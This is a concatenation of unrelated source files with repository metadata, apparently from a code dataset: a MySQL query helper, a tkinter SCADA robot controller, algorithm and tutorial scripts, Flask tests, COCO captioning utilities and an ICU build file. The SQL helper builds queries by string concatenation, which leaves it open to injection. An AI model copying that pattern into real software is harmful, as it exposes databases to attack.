sqlstr = "SELECT TABLE_NAME FROM information_schema.TABLES where Table_SCHEMA = '{0}'".format(self._dbname)
if 'orderby' in kwargs:
sqlstr += (" " + "order by" + " " + kwargs['orderby'])
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
@abstractmethod
def connect(self):
pass
def excuteSql(self,sqlstr):
dbx = self.connect()
db0 = dbx.cursor(self._db.cursors.DictCursor)
db0.execute(sqlstr)
db0.close()
dbx.close()
return db0
def excuteQuery(self,**kwargs):
sqlstr = "select "
target = '*'
if 'target' in kwargs:
target = kwargs['target']
sqlstr += (target + ' ')
if not 'table' in kwargs:
raise QueryError('Query Has No Table')
sqlstr += ('from ' + "`" + kwargs['table'] + "`" + ' ')
if 'join' in kwargs:
sqlstr += (kwargs['join'] + ' ')
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'] + ' ')
if 'groupby' in kwargs:
sqlstr += ("group by " + kwargs['groupby'] + ' ')
if 'orderby' in kwargs:
sqlstr += ("order by " + kwargs['orderby'] + ' ')
#Having here
if 'limit' in kwargs:
sqlstr += ("limit " + kwargs['limit'] + ' ')
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteAdd(self,**kwargs):
sqlstr = 'insert into '
if not 'table' in kwargs:
raise AddError('Add Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
if not 'value' in kwargs:
raise AddError('Add Has No Value')
fields = ""
values = ""
firstvalue = kwargs['value'].pop(0)
for v in firstvalue:
if len(fields) > 0:
fields+=","
values+=","
fields += v
values += '\'{0}\''.format(firstvalue[v])
sqlstr += ("(" + fields + ") ")
sqlstr += "values "
sqlstr += ("(" + values + ")")
for val in kwargs['value']:
values = ''
for v in val:
if len(values)>0:
values+=","
values += '\'{0}\''.format(val[v])
sqlstr += (",(" + values + ")")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteDelete(self,**kwargs):
sqlstr = "delete from "
if not 'table' in kwargs:
raise DeleteError('Delete Has No Table')
sqlstr += (kwargs['table'] + ' ')
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'])
#log here
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteUpdate(self,**kwargs):
sqlstr = "update "
if not 'table' in kwargs:
raise DeleteError('Update Has No Table')
sqlstr += (kwargs['table'] + ' ')
if not 'value' in kwargs:
raise DeleteError('Update Has No Value')
sqlstr += "set "
setstr = ""
for val in kwargs['value']:
for v in val:
if len(setstr) > 0:
setstr += ','
#print(val[v])
setstr += (v + '=' + '\'' + str(val[v]) + '\'')
sqlstr += setstr
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'])
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
| [
"dfdfggg@126.com"
] | dfdfggg@126.com |
457c90bdeecb80fe725ae8d148b6a12d7552e0b7 | 9e6f5a9db0dda137d80e57106c50ede468f70196 | /SCADA.py | ca54c1037107ea1609ddec8a250da982d674ac91 | [] | no_license | lucazanrosso/Python-Scada | ee07b339d53fb84f54169fe3c3be87ca9331e88b | fbaa970d838860dddc068c6528e6170ae1447be0 | refs/heads/main | 2023-04-24T05:31:38.907605 | 2021-05-13T18:38:26 | 2021-05-13T18:38:26 | 304,403,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,352 | py | import tkinter as tk
from pymodbus.client.sync import ModbusTcpClient
import OpenOPC
import pywintypes
pywintypes.datetime = pywintypes.TimeType
root = tk.Tk()
root.title("SCADA Interface")
def scan_abb():
label_abb_server["text"] = "ABB Server: " + opc_client.servers()[0]
def connect_abb():
opc_client.connect(opc_client.servers()[0], entry_abb_address.get())
print(opc_client.list())
global opc_server_name
opc_server_name = opc_client.list()
label_status_abb["text"] = "Status: Connected"
canvas_status_abb.itemconfig(lamp_status_abb, fill='green')
def disconnect_abb():
opc_client.close()
label_status_abb["text"] = "Status: Disconnected"
canvas_status_abb.itemconfig(lamp_status_abb, fill='red')
def scan_and_connect_ur():
global modbus_client
modbus_client = ModbusTcpClient(entry_ur_address.get(), 502)
if modbus_client.connect():
label_ur_server["text"] = "UR Server: " + modbus_client.host + " Port: " + \
str(modbus_client.port)
label_status_ur["text"] = "Status: Connected"
canvas_status_ur.itemconfig(lamp_status_ur, fill='green')
def disconnect_ur():
modbus_client.close()
label_status_ur["text"] = "Status: Disconnected"
canvas_status_ur.itemconfig(lamp_status_ur, fill='red')
def set_scan(value):
global scan
scan = value
if scan:
canvas_scanning.itemconfig(lamp_scanning, fill='green')
scan_variables()
else:
canvas_scanning.itemconfig(lamp_scanning, fill='red')
def scan_variables():
global opc_server_name
if scan:
conveyor_fwd = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_FWD')[0]
conveyor_bwd = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_BWD')[0]
conveyor_obj_sur = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_OBJ_SUR')[0]
if conveyor_obj_sur == 1:
modbus_client.write_register(130, 1)
else:
modbus_client.write_register(130, 0)
if conveyor_fwd == 1:
canvas_conveyor_fwd.itemconfig(lamp_conveyor_fwd, fill="green")
else:
canvas_conveyor_fwd.itemconfig(lamp_conveyor_fwd, fill="red")
if conveyor_bwd == 1:
canvas_conveyor_bwd.itemconfig(lamp_conveyor_bwd, fill="green")
else:
canvas_conveyor_bwd.itemconfig(lamp_conveyor_bwd, fill="red")
can_ready = modbus_client.read_input_registers(131, 1).registers[0]
brick_ready = modbus_client.read_input_registers(132, 1).registers[0]
obj_verified = modbus_client.read_input_registers(133, 1).registers[0]
if obj_verified == 1:
opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.objeto_Verificado', 1))
modbus_client.write_register(133, 0)
if can_ready == 1:
opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Lata', 1))
modbus_client.write_register(131, 0)
canvas_can.itemconfig(lamp_can, fill="green")
total_cans = int(entry_total_can.get()) + 1
entry_total_can.delete(0, tk.END)
entry_total_can.insert(0, total_cans)
else:
canvas_can.itemconfig(lamp_can, fill="white")
if brick_ready == 1:
opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Brick', 1))
modbus_client.write_register(132, 0)
canvas_brick.itemconfig(lamp_brick, fill="green")
total_bricks = int(entry_total_brick.get()) + 1
entry_total_brick.delete(0, tk.END)
entry_total_brick.insert(0, total_bricks)
else:
canvas_brick.itemconfig(lamp_brick, fill="white")
root.after(200, scan_variables)
def start_ur():
modbus_client.write_register(128, 1)
canvas_process.itemconfig(lamp_process, fill='green')
def stop_ur():
modbus_client.write_register(128, 0)
canvas_process.itemconfig(lamp_process, fill='red')
def can():
print(opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Lata', 1)))
def brick():
print(opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Brick', 1)))
def obj_sensor_sur():
modbus_client.write_register(130, 1)
def obj_available():
print(opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_obj_nuevo', 1)))
opc_client = OpenOPC.client()
opc_server_name = opc_client.list()
modbus_client = ModbusTcpClient('127.0.0.1', 502)
scan = False
# ABB
label_connections = tk.Label(root, text="Connections")
label_connections.config(font=("TkDefaultFont", 14))
label_abb_title = tk.Label(root, text="IRB 140 (OPC DA)")
label_abb_title.config(font=("TkDefaultFont", 12))
label_abb_address = tk.Label(root, text="IP Address")
entry_abb_address = tk.Entry(root)
entry_abb_address.insert(0, "127.0.0.1")
button_scan_server_abb = tk.Button(root, text="Scan OPC servers", command=scan_abb, width=15, padx=5, pady=5)
label_abb_server = tk.Label(root, text="ABB Server:")
button_connect_abb = tk.Button(root, text="Connect", command=connect_abb, width=15, padx=5, pady=5)
label_status_abb = tk.Label(root, text="Status: Disconnected")
button_disconnect_abb = tk.Button(root, text="Disconnect", command=disconnect_abb, width=15, padx=5, pady=5)
canvas_status_abb = tk.Canvas(root, width=30, height=30)
lamp_status_abb = canvas_status_abb.create_oval(5, 5, 25, 25, fill='red')
# UR
label_ur_title = tk.Label(root, text="UR3 (MODBUS TCP IP)")
label_ur_title.config(font=("TkDefaultFont", 12))
label_ur_address = tk.Label(root, text="IP Address")
entry_ur_address = tk.Entry(root)
entry_ur_address.insert(0, "192.168.56.128")
button_scan_and_connect_server_ur = tk.Button(root, text="Connect", command=scan_and_connect_ur, width=15, padx=5,
pady=5)
label_ur_server = tk.Label(root, text="UR Server:")
button_disconnect_ur = tk.Button(root, text="Disconnect", command=disconnect_ur, width=15, padx=5, pady=5)
label_status_ur = tk.Label(root, text="Status: Disconnected")
canvas_status_ur = tk.Canvas(root, width=30, height=30)
lamp_status_ur = canvas_status_ur.create_oval(5, 5, 25, 25, fill='red')
# PLC
label_plc_title = tk.Label(root, text="PLC")
checkbox_plc_simulated = tk.Checkbutton(root, text="Simulated")
checkbox_plc_simulated.select()
label_plc_title.config(font=("TkDefaultFont", 12))
label_plc_address = tk.Label(root, text="IP Address")
entry_plc_address = tk.Entry(root)
entry_plc_address.insert(0, "192.168.0.108")
button_plc_connect = tk.Button(root, text="Connect", width=15, padx=5, pady=5)
button_plc_disconnect = tk.Button(root, text="Disconnect", width=15, padx=5, pady=5)
# SIGNALS
label_signals_title = tk.Label(root, text="Signals")
label_signals_title.config(font=("TkDefaultFont", 14))
button_start_scanning = tk.Button(root, text="Scan signals", command=lambda: set_scan(True), width=15, padx=5, pady=5)
canvas_scanning = tk.Canvas(root, width=30, height=30)
lamp_scanning = canvas_scanning.create_oval(5, 5, 25, 25, fill='red')
button_stop_scanning = tk.Button(root, text="Stop scanning", command=lambda: set_scan(False), width=15, padx=5, pady=5)
button_start_process = tk.Button(root, text="Start process", command=start_ur, width=15, padx=5, pady=5)
canvas_process = tk.Canvas(root, width=30, height=30)
lamp_process = canvas_process.create_oval(5, 5, 25, 25, fill='red')
button_stop_process = tk.Button(root, text="Stop process", command=stop_ur, width=15, padx=5, pady=5)
label_input = tk.Label(root, text="INPUT")
label_input.config(font=("TkDefaultFont", 12))
button_can = tk.Button(root, text="Can", command=can, width=15, padx=5, pady=5)
button_brick = tk.Button(root, text="Brick", command=brick, width=15, padx=5, pady=5)
button_obj_available = tk.Button(root, text="Obj available", command=obj_available, width=15, padx=5, pady=5)
button_obj_sensor_sur = tk.Button(root, text="Obj sensor sur", command=obj_sensor_sur, width=15, padx=5, pady=5)
label_output = tk.Label(root, text="OUTPUT")
label_output.config(font=("TkDefaultFont", 12))
label_can = tk.Label(root, text="Can")
canvas_can = tk.Canvas(root, width=30, height=30)
lamp_can = canvas_can.create_oval(5, 5, 25, 25, fill='white')
entry_total_can = tk.Entry(root, width=5)
entry_total_can.insert(0, 0)
label_brick = tk.Label(root, text="Brick")
canvas_brick = tk.Canvas(root, width=30, height=30)
lamp_brick = canvas_brick.create_oval(5, 5, 25, 25, fill='white')
entry_total_brick = tk.Entry(root, width=5)
entry_total_brick.insert(0, 0)
label_conveyor_fwd = tk.Label(root, text="Conveyor FWD")
canvas_conveyor_fwd = tk.Canvas(root, width=30, height=30)
lamp_conveyor_fwd = canvas_conveyor_fwd.create_oval(5, 5, 25, 25, fill='red')
label_conveyor_bwd = tk.Label(root, text="Conveyor BWD")
canvas_conveyor_bwd = tk.Canvas(root, width=30, height=30)
lamp_conveyor_bwd = canvas_conveyor_bwd.create_oval(5, 5, 25, 25, fill='red')
# ABB
label_connections.grid(sticky="W", row=2, column=2, padx=5, pady=5)
label_abb_title.grid(sticky="W", row=3, column=2, padx=5, pady=5, columnspan=3)
label_abb_address.grid(sticky="E", row=4, column=2, padx=5, pady=5)
entry_abb_address.grid(sticky="W", row=4, column=3, padx=5, pady=5, columnspan=2)
button_scan_server_abb.grid(sticky="W", row=5, column=2, padx=5, pady=5)
label_abb_server.grid(sticky="W", row=5, column=3, padx=5, pady=5, columnspan=2)
button_connect_abb.grid(sticky="W", row=6, column=2, padx=5, pady=5)
label_status_abb.grid(sticky="W", row=6, column=3, padx=5, pady=5)
canvas_status_abb.grid(sticky="W", row=6, column=4, padx=(5, 30))
button_disconnect_abb.grid(sticky="W", row=7, column=2, padx=5, pady=5)
# UR
label_ur_title.grid(sticky="W", row=9, column=2, padx=5, pady=5, columnspan=3)
label_ur_address.grid(sticky="E", row=10, column=2, padx=5, pady=5)
entry_ur_address.grid(sticky="W", row=10, column=3, padx=5, pady=5)
button_scan_and_connect_server_ur.grid(sticky="W", row=11, column=2, padx=5, pady=5, columnspan=2)
label_ur_server.grid(sticky="W", row=11, column=3, padx=5, pady=5, columnspan=2)
button_disconnect_ur.grid(sticky="W", row=12, column=2, padx=5, pady=5)
label_status_ur.grid(sticky="W", row=12, column=3, padx=5, pady=5)
canvas_status_ur.grid(sticky="W", row=12, column=4)
# PLC
label_plc_title.grid(sticky="W", row=14, column=2, padx=5, pady=5)
checkbox_plc_simulated.grid(sticky="W", row=14, column=3, padx=5, pady=5)
label_plc_address.grid(sticky="E", row=15, column=2, padx=5, pady=5)
entry_plc_address.grid(sticky="W", row=15, column=3, padx=5, pady=5)
button_plc_connect.grid(sticky="W", row=16, column=2, padx=5, pady=5)
button_plc_disconnect.grid(sticky="W", row=17, column=2, padx=5, pady=5)
# SIGNALS
label_signals_title.grid(sticky="W", row=2, column=7, padx=5, pady=5)
button_start_scanning.grid(sticky="W", row=4, column=7, padx=5, pady=5)
canvas_scanning.grid(sticky="W", row=4, column=8, padx=5, pady=5)
button_stop_scanning.grid(sticky="W", row=5, column=7, padx=5, pady=5)
button_start_process.grid(sticky="W", row=6, column=7, padx=5, pady=5)
canvas_process.grid(sticky="W", row=6, column=8, padx=5, pady=5)
button_stop_process.grid(sticky="W", row=7, column=7, padx=5, pady=5)
label_input.grid(sticky="W", row=9, column=7, padx=5, pady=(40, 5))
button_can.grid(sticky="W", row=10, column=7, padx=5, pady=5)
button_brick.grid(sticky="W", row=10, column=8, padx=5, pady=5, columnspan=2)
button_obj_sensor_sur.grid(sticky="W", row=11, column=7, padx=5, pady=5)
button_obj_available.grid(sticky="W", row=11, column=8, padx=5, pady=5, columnspan=2)
label_output.grid(sticky="W", row=13, column=7, padx=5, pady=5)
label_can.grid(sticky="W", row=14, column=7, padx=5, pady=5)
canvas_can.grid(sticky="W", row=14, column=8, padx=5, pady=5)
entry_total_can.grid(sticky="W", row=14, column=9, padx=5, pady=5)
label_brick.grid(sticky="W", row=15, column=7, padx=5, pady=5)
canvas_brick.grid(sticky="W", row=15, column=8, padx=5, pady=5)
entry_total_brick.grid(sticky="W", row=15, column=9, padx=5, pady=5)
label_conveyor_fwd.grid(sticky="W", row=16, column=7, padx=5, pady=5)
canvas_conveyor_fwd.grid(sticky="W", row=16, column=8, padx=5, pady=5)
label_conveyor_bwd.grid(sticky="W", row=17, column=7, padx=5, pady=5)
canvas_conveyor_bwd.grid(sticky="W", row=17, column=8, padx=5, pady=5)
root.mainloop()
| [
"lucazanrosso94@gmail.com"
] | lucazanrosso94@gmail.com |
1260bf85376667fd2991ee2aa31c34beadda002a | 7872ca984d8e5809fee3868810febdd3273c8787 | /BOJ/dynamic_programming/11057-오르막_수.py | 39063cd46ab976b7293b76bc1013fb3ddfbb90f9 | [] | no_license | hwamoc/Algorithm | dcc99252b3a444aecf62544fdc5282c8a1a8de3d | 4b9c086b0807736e80ce0e8da8415865cb555921 | refs/heads/master | 2022-12-24T05:11:10.044203 | 2020-10-05T09:43:43 | 2020-10-05T09:43:43 | 277,570,498 | 0 | 0 | null | 2020-10-05T09:43:44 | 2020-07-06T14:51:39 | Python | UTF-8 | Python | false | false | 864 | py | '''
# 예제 입력 1
1
# 예제 입력 2
2
# 예제 입력 3
3
'''
from sys import stdin
input = stdin.readline
# 끝자리가 0~9인 개수를 모두 따져본다.
# nc[i][j]는 i자리 수에서 j로 끝나는 수들의 총 개수
# nc[i][j] = nc[i-1][j] + nc[i][j-1] 라는 점화식을 가진다.
N = int(input())
nc = [[1]*10 for _ in range(N+1)]
mod = 10007
print(nc)
for i in range(2, N+1):
for j in range(1, 10):
nc[i][j] = (nc[i-1][j] + nc[i][j-1]) % mod
print(nc)
print(sum(nc[N])%mod)
'''
N = int(input())
nums = [1] * 10
mod = 10007
for _ in range(N-1):
for i in range(1, 10):
nums[i] = (nums[i] + nums[i-1]) % mod
print(nums[i])
print("--------------")
sys.stdout.write(str(sum(nums) % mod))
'''
'''
k=int(input())
result=1
for i in range(9+k,9,-1):
result*=i
for i in range(1,k+1):
result//=i
print(result%10007)
''' | [
"hwamok222@naver.com"
] | hwamok222@naver.com |
856646a13abfa675fe8af4f6c9cf65e07f64f447 | 6d5a5c731f89933c7086ecd7d26999b79bc7217a | /Inflearn/stringPrac.py | 33b9bd610fc6fd0e93387a7b9f24ecaa77075782 | [] | no_license | minhyeonlee/python-basic | 7fbb9ff3816ac72c19d2cb2192c324a379082b16 | 007d1fc455927e83188e345bf3fc5cd8d5753b49 | refs/heads/master | 2022-04-13T09:57:39.270863 | 2020-03-28T07:25:14 | 2020-03-28T07:25:14 | 247,428,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,306 | py | '''
Inflearn, 파이썬 무료 강의 (기본편) - 6시간 뒤면 나도 개발자
Section3. 문자열 처리
'''
# 1강. 문자열
# ''와 ""은 모두 문자열이다.
sentence = '나는 소년입니다.'
print(sentence)
sentence2 = "파이썬은 쉬워요"
print(sentence2)
#여러줄을 저장해서 출력할 수 있다.
sentence3 = '''
나는 소년이고,
파이썬은 쉬워요
'''
print(sentence3)
# 2강. 슬라이싱
idnumber = "990120-1234567"
print("성별: " + idnumber[7]) # 1
print("연: " + idnumber[0:2]) # 0 부터 2 직전까지 (0, 1에 있는 값 가져옴)
print("월: " + idnumber[2:4]) # 01
print("일: " + idnumber[4:6]) # 21
print("생년월일: " + idnumber[:6]) # 처음부터 6번째 직전까지
print("뒤 7자리: "+ idnumber[7:]) # 7부터 끝까지
print("뒤 7자리 (뒤에서부터): " + idnumber[-7:]) # 맨 뒤에서 7째부터 끝까
# 3강. 문자열처리함수
python = "Python is Amazing"
print(python.lower()) # 소문자 출력
print(python.upper()) # 대문자 출력
print(python[0].isupper()) # python[0]의 문자가 대문자인지 확인, True/False로 리턴
print(len(python)) # 문자열 길이 반환
print(python.replace("Python", "Java")) # 문자열을 찾은 후 다른 문자열로 바꾼다.
index = python.index("n") # 해당 문자열이 어느 위치에 있는지 찾아줌
print(index)
index = python.index("n", index+1) # 아까 찾은 n(5에 위치) 이후 부터 검색한다.
print(index)
print(python.find("n")) # index 처럼 검색해준다.
print(python.find("Java")) # 원하는 문자가 없을 경우 -1을 반환
#print(python.index("Java"))를 쓰면 오류
print(python.count("n")) # 해당 문자열이 몇 개 들어있는지 검색
# 4강. 문자열 포맷
print("a" + "b")
print("a", "b")
# 방법 1
print("나는 %d살입니다." % 20) # %d: 정수 값
print("나는 %s을 좋아해요." % "파이썬") # %s: string 값, 정수도 출력 할 수 있다.
print("Apple은 %c로 시작해요." % "A") # %c: char(문자 1개) 값
print("나는 %s살입니다." % 20)
print("나는 %s색과 %s색을 좋아해요." %("파란", "빨간"))
# 방법 2
print("나는 {}살 입니다.".format(20))
print("나는 {}색과 {}색을 좋아해요.".format("파란", "빨간"))
print("나는 {0}색과 {1}색을 좋아해요.".format("파란", "빨간"))
print("나는 {1}색과 {0}색을 좋아해요.".format("파란", "빨간"))
# 방법 3
print("나는 {age}살이며, {color}색을 좋아해요.".format(age=30, color="빨간"))
print("나는 {age}살이며, {color}색을 좋아해요.".format(color="빨간", age=30))
# 방법 4(v3.6이상 부터 가능)
age = "20"
color ="빨간"
print(f"나는 {age}살이며, {color}색을 좋아해요.")
# 5강. 탈출문자
# \n: 줄바꿈
print("백문이 불여일견\n백견이 불여일타")
# \" \': 문장 내에서 따옴
# 저는 "나도코딩"입니다.
print("저는 '나도코딩'입니다.")
print('저는 "나도코딩"입니다.')
print("저는 \"나도코딩\"입니다.")
print("저는 \'나도코딩\'입니다.")
# \\: 문장 내에서 \(경로 출력 등에 사용)
print("C:\\User\\Desktop")
# \r: 커서를 맨 앞으로 이동
print("Red Apple\rPine")
# \b: 백스페이스 (한 글자 삭제)
print("Redd\bApple")
# \t: 탭
print("Red\tApple")
| [
"minhyeonlee1@gmail.com"
] | minhyeonlee1@gmail.com |
1d8f707d85637cff428c5a8591200c9101f5dd02 | 7347e21b270b67bcc5820e5c285921f6edafbcb4 | /src/tests/resources/test_app_server.py | 52528296068fab3dc158d3765da69c139aa10c23 | [] | no_license | taller2fiuba/chotuve-auth-server | 21b2db4ae034883033ea8aa860347567ab9b8473 | 882ac7cb52a6c4cf81ed3bd4d59b643a73078054 | refs/heads/master | 2023-04-18T21:15:34.085832 | 2020-07-31T00:51:09 | 2020-07-31T00:51:09 | 257,125,839 | 0 | 0 | null | 2021-05-06T20:14:23 | 2020-04-19T23:45:26 | Python | UTF-8 | Python | false | false | 3,844 | py | import unittest
import mock
from app import app
from tests.base import BaseTestCase
class AppServerTestCase(BaseTestCase):
def setUp(self):
super().setUp()
patcher = mock.patch('app.autenticacion.validar_admin_token')
mock_validar_admin_token = patcher.start()
mock_validar_admin_token.return_value = True
self.addCleanup(patcher.stop)
def test_get_devuelve_vacio_sin_app_servers(self):
response = self.app.get('/app-server')
self.assertEqual(200, response.status_code)
self.assertEqual([], response.json)
def test_get_devuelve_app_servers(self):
self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
response = self.app.get('/app-server')
self.assertEqual(200, response.status_code)
self.assertEqual(1, len(response.json))
self.assertEqual('url', response.json[0]['url'])
self.assertEqual('nombre', response.json[0]['nombre'])
def test_get_devuelve_400_en_paginado_erroneo(self):
response = self.app.get('/app-server?offset=casa&cantidad=coso')
self.assertEqual(400, response.status_code)
def test_get_devuelve_app_server_por_id(self):
r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
app_id = r.json['id']
response = self.app.get(f'/app-server/{app_id}')
self.assertEqual(200, response.status_code)
self.assertEqual('url', response.json['url'])
self.assertEqual('nombre', response.json['nombre'])
def test_get_devuelve_404_en_id_inexistente(self):
response = self.app.get('/app-server/123')
self.assertEqual(404, response.status_code)
def test_post_devuelve_nuevo_token_de_app_server(self):
response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
self.assertEqual(201, response.status_code)
self.assertIn('token', response.json)
def test_post_devuelve_400_si_ya_existe_url(self):
response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
self.assertEqual(400, response.status_code)
def test_post_devuelve_400_si_faltan_datos(self):
response = self.app.post('/app-server', json={'url': 'url'})
self.assertEqual(400, response.status_code)
response = self.app.post('/app-server', json={'nombre': 'nombre'})
self.assertEqual(400, response.status_code)
response = self.app.post('/app-server')
self.assertEqual(400, response.status_code)
def test_delete_devuelve_404_si_no_existe_app_server(self):
response = self.app.delete('/app-server/123')
self.assertEqual(404, response.status_code)
def test_delete_elimina_app_server_correctamente(self):
r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
app_id = r.json['id']
response = self.app.delete(f'/app-server/{app_id}')
self.assertEqual(200, response.status_code)
def test_get_sesion_devuelve_200_en_token_valido(self):
app.config['IGNORAR_APP_SERVER_TOKEN'] = False
r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
self.assertEqual(201, r.status_code)
app_token = r.json['token']
response = self.app.get('/app-server/sesion', headers={'X-APP-SERVER-TOKEN': app_token})
self.assertEqual(200, response.status_code)
def test_get_sesion_devuelve_401_en_token_invalido(self):
app.config['IGNORAR_APP_SERVER_TOKEN'] = False
response = self.app.get('/app-server/sesion', headers={'X-APP-SERVER-TOKEN': 'invalido'})
self.assertEqual(401, response.status_code)
if __name__ == '__main__':
unittest.main()
| [
"sportelliluciano@gmail.com"
] | sportelliluciano@gmail.com |
cb42037c53fdb36811de199c77965b36a6d8534e | 65f98765b5e9ebe971c494af0b37a230757a00f1 | /HW4/coco_utils.py | 9cd8c99290b72619099b46c5a1c792bd22cec088 | [] | no_license | BingqianY/EECS-545-Machine-Learning | 01112686a8c6eb4a60a2454018708a96a37b7caa | 7a511b3936b34b7c130368241577b282edb5e8a7 | refs/heads/master | 2022-12-09T15:40:13.807210 | 2020-09-07T17:18:08 | 2020-09-07T17:18:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | from builtins import range
import os, json
import numpy as np
import h5py
BASE_DIR = 'coco_captioning'
def load_coco_data(base_dir=BASE_DIR,
max_train=None,
pca_features=True):
data = {}
caption_file = os.path.join(base_dir, 'coco2014_captions.h5')
with h5py.File(caption_file, 'r') as f:
for k, v in f.items():
data[k] = np.asarray(v)
if pca_features:
train_feat_file = os.path.join(base_dir, 'train2014_vgg16_fc7_pca.h5')
else:
train_feat_file = os.path.join(base_dir, 'train2014_vgg16_fc7.h5')
with h5py.File(train_feat_file, 'r') as f:
data['train_features'] = np.asarray(f['features'])
if pca_features:
val_feat_file = os.path.join(base_dir, 'val2014_vgg16_fc7_pca.h5')
else:
val_feat_file = os.path.join(base_dir, 'val2014_vgg16_fc7.h5')
with h5py.File(val_feat_file, 'r') as f:
data['val_features'] = np.asarray(f['features'])
dict_file = os.path.join(base_dir, 'coco2014_vocab.json')
with open(dict_file, 'r') as f:
dict_data = json.load(f)
for k, v in dict_data.items():
data[k] = v
train_url_file = os.path.join(base_dir, 'train2014_urls.txt')
with open(train_url_file, 'r') as f:
train_urls = np.asarray([line.strip() for line in f])
data['train_urls'] = train_urls
val_url_file = os.path.join(base_dir, 'val2014_urls.txt')
with open(val_url_file, 'r') as f:
val_urls = np.asarray([line.strip() for line in f])
data['val_urls'] = val_urls
# Maybe subsample the training data
if max_train is not None:
num_train = data['train_captions'].shape[0]
mask = np.random.randint(num_train, size=max_train)
data['train_captions'] = data['train_captions'][mask]
data['train_image_idxs'] = data['train_image_idxs'][mask]
return data
def decode_captions(captions, idx_to_word):
singleton = False
if captions.ndim == 1:
singleton = True
captions = captions[None]
decoded = []
N, T = captions.shape
for i in range(N):
words = []
for t in range(T):
word = idx_to_word[captions[i, t]]
if word != '<NULL>':
words.append(word)
if word == '<END>':
break
decoded.append(' '.join(words))
if singleton:
decoded = decoded[0]
return decoded
def sample_coco_minibatch(data, batch_size=100, split='train', seed = None):
if seed:
np.random.seed(seed)
split_size = data['%s_captions' % split].shape[0]
mask = np.random.choice(split_size, batch_size)
captions = data['%s_captions' % split][mask]
image_idxs = data['%s_image_idxs' % split][mask]
image_features = data['%s_features' % split][image_idxs]
urls = data['%s_urls' % split][image_idxs]
return captions, image_features, urls
| [
"noreply@github.com"
] | noreply@github.com |
037e7c688589c6f62e908de38bbd66aa0d06136a | affe5181dc52444c81b0ed353b4d02dadb4fb9f5 | /logictensornetworks_library.py | 2623e17ac3dfcb97d06ea025f6e2e85c7df4e675 | [
"MIT"
] | permissive | gilbeckers/logictensornetworks | d52ae9e856bd35508139e26cb45397be9824cc2c | c4cc3628db91030230c78d3b964c26304a3b452b | refs/heads/master | 2021-01-02T17:40:28.714759 | 2020-02-13T09:36:21 | 2020-02-13T09:36:21 | 239,727,377 | 0 | 0 | MIT | 2020-02-11T09:49:24 | 2020-02-11T09:49:23 | null | UTF-8 | Python | false | false | 334 | py | import tensorflow as tf
def equal_simple(x,y):
return tf.exp(-tf.reduce_sum(tf.abs(x-y),1,keepdims=True))
default_equal_diameter = 1.0
def equal_euclidian(t_1,t_2,diameter=default_equal_diameter):
delta = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(t_1,t_2)),1,keepdims=True))
return tf.exp(-tf.divide(delta,diameter))
| [
"spranger@nova"
] | spranger@nova |
671c07d1bae3bbeba7c5b48667c2e1e16124ad39 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/icu/icu.gyp | 4e3c0063727072f7e4a288d3da375b851154b2a4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unicode",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"NAIST-2003",
"ICU"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 23,500 | gyp | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'icu.gypi',
],
'variables': {
'use_system_icu%': 0,
'icu_use_data_file_flag%': 0,
'want_separate_host_toolset%': 1,
},
'target_defaults': {
'direct_dependent_settings': {
'defines': [
# Tell ICU to not insert |using namespace icu;| into its headers,
# so that chrome's source explicitly has to use |icu::|.
'U_USING_ICU_NAMESPACE=0',
# We don't use ICU plugins and dyload is only necessary for them.
# NaCl-related builds also fail looking for dlfcn.h when it's enabled.
'U_ENABLE_DYLOAD=0',
# With exception disabled, MSVC emits C4577 warning on coming across
# 'noexcept'. See http://bugs.icu-project.org/trac/ticket/12406
# TODO(jshin): Remove this when updating to a newer version with this
# fixed.
'U_NOEXCEPT=',
],
},
'defines': [
'U_USING_ICU_NAMESPACE=0',
'HAVE_DLOPEN=0',
